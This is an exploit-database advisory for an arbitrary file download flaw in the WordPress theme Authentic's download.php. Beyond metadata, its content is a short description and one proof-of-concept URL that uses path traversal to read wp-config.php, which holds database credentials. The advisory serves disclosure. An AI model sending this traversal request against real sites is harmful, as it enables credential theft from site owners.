WordPress Theme Authentic - 'download.php' Arbitrary File Download
| EKU-ID: 43643 | CVE: | OSVDB-ID: |
| Author: Ashiyane Digital Security Team | Published: 2014-09-08 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 43643 | CVE: | OSVDB-ID: |
| Author: Ashiyane Digital Security Team | Published: 2014-09-08 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/69671/info Authentic theme for Wordpress is prone to an arbitrary file-download vulnerability. An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php